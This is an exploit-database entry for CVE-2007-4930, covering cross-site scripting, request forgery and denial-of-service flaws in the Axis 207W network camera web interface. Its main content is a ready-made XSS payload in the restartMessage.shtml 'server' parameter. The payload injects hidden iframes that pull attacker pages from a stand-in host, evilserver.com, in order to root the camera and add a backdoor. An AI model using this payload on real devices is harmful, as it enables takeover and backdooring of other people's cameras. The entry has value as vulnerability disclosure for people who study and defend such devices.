Axis Communications 207W Network Camera - Web Interface '/admin/restartMessage.shtml?server' Cross-S



EKU-ID: 35618 CVE: CVE-2007-4930;OSVDB-39483 OSVDB-ID:
Author: Seth Fogie Published: 2007-09-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/25678/info

Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability.

Exploiting these issues may allow an attacker to compromise the device or to prevent other users from using the device.

Root the camera/add a backdoor -
http://www.example.com/admin/restartMessage.shtml?server=<iframe%20style=visibility:hidden%20src=http://www.evilserver.com/wifi/axisbd.php><iframe
src=http://www.evilserver.com/wifi/axisrb.htm><!â??